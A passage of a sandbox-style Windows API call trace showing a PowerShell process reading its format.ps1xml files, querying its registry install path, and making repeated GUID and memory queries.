[7]=0x2f))) returned 0x0 [0078.839] SetErrorMode (uMode=0x1) returned 0x1 [0078.839] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.839] SetErrorMode (uMode=0x1) returned 0x1 [0078.840] GetFileType (hFile=0x310) returned 0x1 [0078.840] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.841] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.841] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.841] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.841] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.842] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.842] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.842] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.842] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.843] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.844] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0xe67, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3ae9c2f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3ae9c2f*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.845] ReadFile (in: hFile=0x310, lpBuffer=0x3aea660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3aea660*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.846] SetErrorMode (uMode=0x1) returned 0x1 [0078.846] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0078.846] SetErrorMode (uMode=0x1) returned 0x1 [0078.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.846] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.846] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0310 [0078.846] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0310, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.846] CoTaskMemFree (pv=0x1b8f0310) [0078.846] RegCloseKey (hKey=0x310) returned 0x0 [0078.850] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x2488b00e, Data2=0x286, Data3=0x482f, Data4=([0]=0xa3, [1]=0xb3, [2]=0x1b, [3]=0x4a, [4]=0x79, [5]=0xc5, [6]=0xde, [7]=0x8b))) returned 0x0 [0078.850] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xeddd7ddc, Data2=0xbe7e, Data3=0x4d1f, Data4=([0]=0xad, [1]=0xc3, [2]=0xf6, [3]=0x74, [4]=0x3d, [5]=0x9a, [6]=0x81, [7]=0x66))) returned 0x0 [0078.850] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x555f3416, Data2=0xe03e, Data3=0x4236, Data4=([0]=0xbc, [1]=0x16, [2]=0x27, [3]=0x1e, [4]=0xca, [5]=0x6d, [6]=0x33, [7]=0x68))) returned 0x0 [0078.851] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x33d5ea21, Data2=0x567e, Data3=0x4b30, Data4=([0]=0xb6, [1]=0x89, [2]=0xb7, [3]=0x8c, [4]=0x2d, [5]=0x2, [6]=0x48, [7]=0xb3))) returned 0x0 [0078.852] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x32ffbab9, Data2=0x1d95, Data3=0x4af1, Data4=([0]=0x9b, [1]=0xcc, [2]=0xea, [3]=0x3b, [4]=0x29, [5]=0x41, [6]=0xa5, [7]=0xf4))) returned 0x0 [0078.852] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x40f1026b, Data2=0x90c8, Data3=0x4aa7, Data4=([0]=0x8b, [1]=0x36, [2]=0x5, [3]=0x2c, [4]=0xc6, [5]=0x4c, [6]=0x9f, [7]=0xdc))) returned 0x0 [0078.852] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x86bf6f87, Data2=0xc20e, Data3=0x492d, Data4=([0]=0x99, [1]=0x1f, [2]=0x59, [3]=0x60, [4]=0xa1, [5]=0x5d, [6]=0xe1, [7]=0x61))) returned 0x0 [0078.852] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.852] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x823520f4, Data2=0xd03f, Data3=0x4d78, Data4=([0]=0xac, [1]=0x87, [2]=0xd2, [3]=0x7c, [4]=0x32, [5]=0x50, [6]=0xc, [7]=0x26))) returned 0x0 [0078.853] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xe7cb25eb, Data2=0xd779, Data3=0x4a48, Data4=([0]=0x8d, [1]=0x59, [2]=0x35, [3]=0xf5, [4]=0xfc, [5]=0xa5, [6]=0xf0, [7]=0xb8))) returned 0x0 [0078.853] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xfbb22273, Data2=0xe0c5, Data3=0x4e59, Data4=([0]=0xa3, [1]=0x7f, [2]=0xd0, [3]=0x7c, [4]=0x4c, [5]=0x4b, [6]=0x35, [7]=0xa8))) returned 0x0 [0078.853] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xfde2329b, Data2=0xadaa, Data3=0x4b84, Data4=([0]=0xaa, [1]=0x84, [2]=0xc, [3]=0x38, [4]=0x97, [5]=0x82, [6]=0x6a, [7]=0x26))) returned 0x0 [0078.853] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x2e82c48d, Data2=0xcd4a, Data3=0x45ec, Data4=([0]=0xbe, [1]=0xfb, [2]=0x85, [3]=0x7e, [4]=0x45, [5]=0x1a, [6]=0x27, [7]=0x32))) returned 0x0 [0078.853] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x45e5bc6, Data2=0x187f, Data3=0x443d, Data4=([0]=0x8f, [1]=0x12, [2]=0xb2, [3]=0xb6, [4]=0xa7, [5]=0xa1, [6]=0x89, [7]=0x8e))) returned 0x0 [0078.853] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x15700547, Data2=0xbb7f, Data3=0x4803, Data4=([0]=0x8f, [1]=0x46, [2]=0x7f, [3]=0x5f, [4]=0x2a, [5]=0x19, [6]=0xff, [7]=0xa0))) returned 0x0 [0078.854] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x26fdcd70, Data2=0x4eaa, Data3=0x460e, Data4=([0]=0x9c, [1]=0xfb, [2]=0x73, [3]=0xc3, [4]=0xdb, [5]=0xf4, [6]=0x4a, [7]=0xff))) returned 0x0 [0078.854] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xf9c37a78, Data2=0xe204, Data3=0x466f, Data4=([0]=0xb6, [1]=0xdc, [2]=0x5, [3]=0x39, [4]=0x21, [5]=0xa8, [6]=0x80, [7]=0x30))) returned 0x0 [0078.854] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xe06b351f, Data2=0x166c, Data3=0x4a87, Data4=([0]=0xa3, [1]=0x59, [2]=0x9c, [3]=0x9c, [4]=0xea, [5]=0x37, [6]=0xa4, [7]=0x67))) returned 0x0 [0078.854] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xcf3e807f, Data2=0x6db1, Data3=0x437e, Data4=([0]=0x96, [1]=0x79, [2]=0x29, [3]=0x74, [4]=0xad, [5]=0x64, [6]=0xf5, [7]=0xd4))) returned 0x0 [0078.854] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x352c6e2d, Data2=0xe4e2, Data3=0x491f, Data4=([0]=0xa5, [1]=0x75, [2]=0x45, [3]=0xdc, [4]=0xbd, [5]=0xf1, [6]=0x39, [7]=0x53))) returned 0x0 [0078.854] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.855] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.855] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.855] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb9712db4, Data2=0x1047, Data3=0x4876, Data4=([0]=0xa1, [1]=0xf, [2]=0xe5, [3]=0x53, [4]=0x70, [5]=0xc5, [6]=0x14, [7]=0x5))) returned 0x0 [0078.855] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x7496ee62, Data2=0x169a, Data3=0x40a2, Data4=([0]=0x97, [1]=0x43, [2]=0x73, [3]=0xa5, [4]=0x63, [5]=0x72, [6]=0x41, [7]=0x75))) returned 0x0 [0078.856] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xf091c02b, Data2=0x2ef5, Data3=0x46ec, Data4=([0]=0x80, [1]=0xb5, [2]=0x30, [3]=0x26, [4]=0xae, [5]=0x26, [6]=0xd0, [7]=0x65))) returned 0x0 [0078.856] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x20b5befe, Data2=0xb37a, Data3=0x40ce, Data4=([0]=0xa6, [1]=0x57, [2]=0x9f, [3]=0xaf, [4]=0xa1, [5]=0x96, [6]=0xf5, [7]=0x6b))) returned 0x0 [0078.856] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xf1c294e0, Data2=0xb8ac, Data3=0x4d13, Data4=([0]=0x9c, [1]=0x67, [2]=0x73, [3]=0x6a, [4]=0x4d, [5]=0xef, [6]=0x51, [7]=0x1f))) returned 0x0 [0078.856] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8da5667c, Data2=0x5d4e, Data3=0x4392, Data4=([0]=0x9c, [1]=0xef, [2]=0x1f, [3]=0xa3, [4]=0x49, [5]=0x7c, [6]=0xe, [7]=0xda))) returned 0x0 [0078.856] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xcc5b77e8, Data2=0x6e61, Data3=0x4e12, Data4=([0]=0xb5, [1]=0x88, [2]=0xaf, [3]=0xd, [4]=0x4b, [5]=0xb3, [6]=0x85, [7]=0x55))) returned 0x0 [0078.856] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xe31f66c5, Data2=0x7de1, Data3=0x4fe7, Data4=([0]=0x82, [1]=0x15, [2]=0xf, [3]=0x60, [4]=0x2, [5]=0x8, [6]=0x83, [7]=0xd7))) returned 0x0 [0078.857] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xdcdabbf5, Data2=0xc3b4, Data3=0x40a5, Data4=([0]=0xaa, [1]=0x7e, [2]=0x97, [3]=0x2d, [4]=0xcd, [5]=0x9e, [6]=0x9a, [7]=0x84))) returned 0x0 [0078.857] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x9b04161c, Data2=0xc5bf, Data3=0x400d, Data4=([0]=0xbb, [1]=0x25, [2]=0x61, [3]=0xb6, [4]=0xa2, [5]=0x99, [6]=0x83, [7]=0x2a))) returned 0x0 [0078.857] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xe10092e, Data2=0x950a, Data3=0x4ab2, Data4=([0]=0x84, [1]=0x1f, [2]=0x5d, [3]=0xd5, [4]=0x9, [5]=0x76, [6]=0x7f, [7]=0xfd))) returned 0x0 [0078.857] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xd967df61, Data2=0x9496, Data3=0x4222, Data4=([0]=0xaf, [1]=0x35, [2]=0x84, [3]=0x66, [4]=0x4c, [5]=0xe0, [6]=0xae, [7]=0xe5))) returned 0x0 [0078.857] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xaa89703c, Data2=0x57a7, Data3=0x4cfb, Data4=([0]=0x91, [1]=0x83, [2]=0x2d, [3]=0x2e, [4]=0xed, [5]=0x21, [6]=0x2e, [7]=0xb))) returned 0x0 [0078.857] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.858] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x94b06212, Data2=0x73ac, Data3=0x43b8, Data4=([0]=0xb5, [1]=0x46, [2]=0x31, [3]=0x29, [4]=0xf8, [5]=0xdb, [6]=0x1e, [7]=0x19))) returned 0x0 [0078.858] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.860] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.861] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xae587049, Data2=0x15d8, Data3=0x44d7, Data4=([0]=0x99, [1]=0x7d, [2]=0x78, [3]=0x4f, [4]=0x9, [5]=0xef, [6]=0x56, [7]=0x30))) returned 0x0 [0078.862] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.862] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x2e88ffba, Data2=0xbdbd, Data3=0x4a37, Data4=([0]=0xac, [1]=0xf3, [2]=0xc1, [3]=0xe2, [4]=0x65, [5]=0x41, [6]=0x54, [7]=0x51))) returned 0x0 [0078.862] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x785835ee, Data2=0x453a, Data3=0x4d78, Data4=([0]=0x82, [1]=0x9e, [2]=0x64, [3]=0xf1, [4]=0x24, [5]=0x3a, [6]=0x36, [7]=0x14))) returned 0x0 [0078.862] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x98f260d4, Data2=0x9472, Data3=0x4d6d, Data4=([0]=0x8d, [1]=0x61, [2]=0x7f, [3]=0xd7, [4]=0x7, [5]=0xd, [6]=0xbb, [7]=0xa5))) returned 0x0 [0078.862] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x21d6edb4, Data2=0x1d00, Data3=0x44af, Data4=([0]=0xbc, [1]=0x1e, [2]=0x0, [3]=0x4b, [4]=0xdd, [5]=0xb, [6]=0x6, [7]=0xcd))) returned 0x0 [0078.863] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x144d9694, Data2=0x3192, Data3=0x40d7, Data4=([0]=0xb8, [1]=0x83, [2]=0xea, [3]=0xe1, [4]=0x62, [5]=0x15, [6]=0x7e, [7]=0xcc))) returned 0x0 [0078.863] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x91ebc6da, Data2=0x50d8, Data3=0x40ca, Data4=([0]=0x83, [1]=0x82, [2]=0x96, [3]=0xb8, [4]=0x8b, [5]=0x78, [6]=0x54, [7]=0xd2))) returned 0x0 [0078.863] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x99e7bdf3, Data2=0x8015, Data3=0x4719, Data4=([0]=0xbc, [1]=0x6a, [2]=0x59, [3]=0x1e, [4]=0x4, [5]=0x5, [6]=0xd1, [7]=0x1))) returned 0x0 [0078.863] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.863] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x96444b40, Data2=0x839b, Data3=0x4374, Data4=([0]=0xab, [1]=0x87, [2]=0x9f, [3]=0xd8, [4]=0x96, [5]=0x64, [6]=0x71, [7]=0x21))) returned 0x0 [0078.864] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8dc2e39, Data2=0x86ad, Data3=0x4cda, Data4=([0]=0x8d, [1]=0xca, [2]=0xbd, [3]=0x7b, [4]=0x89, [5]=0xe8, [6]=0x3a, [7]=0xff))) returned 0x0 [0078.864] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x62f61e87, Data2=0x9871, Data3=0x4d35, Data4=([0]=0x8f, [1]=0x28, [2]=0xb, [3]=0xd7, [4]=0xa9, [5]=0xcb, [6]=0xd6, [7]=0x5f))) returned 0x0 [0078.864] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x938db1b0, Data2=0x2e58, Data3=0x4a6e, Data4=([0]=0x99, [1]=0xce, [2]=0xc8, [3]=0x79, [4]=0xfe, [5]=0x9e, [6]=0xf8, [7]=0x61))) returned 0x0 [0078.864] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x668c5c49, Data2=0x3165, Data3=0x46fb, Data4=([0]=0x81, [1]=0x54, [2]=0xc2, [3]=0x72, [4]=0x61, [5]=0x6b, [6]=0xea, [7]=0x75))) returned 0x0 [0078.864] VirtualQuery (in: lpAddress=0xcb960, lpBuffer=0xcc820, dwLength=0x30 | out: lpBuffer=0xcc820*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.865] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x7a0614, Data2=0x38f0, Data3=0x4829, Data4=([0]=0x82, [1]=0x86, [2]=0xc, [3]=0x7f, [4]=0x2c, [5]=0x7e, [6]=0x54, [7]=0xdf))) returned 0x0 [0078.865] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x556780d2, Data2=0x1580, Data3=0x4cde, Data4=([0]=0xb6, [1]=0x99, [2]=0xb3, [3]=0x7c, [4]=0xee, [5]=0xc, [6]=0xfa, [7]=0xe0))) returned 0x0 [0078.865] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.865] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.865] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.865] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.866] SetErrorMode (uMode=0x1) returned 0x1 [0078.866] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.866] SetErrorMode (uMode=0x1) returned 0x1 [0078.866] GetFileType (hFile=0x310) returned 0x1 [0078.866] ReadFile (in: hFile=0x310, lpBuffer=0x3c485f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c485f8*, lpNumberOfBytesRead=0xcccf8*=0x1000, 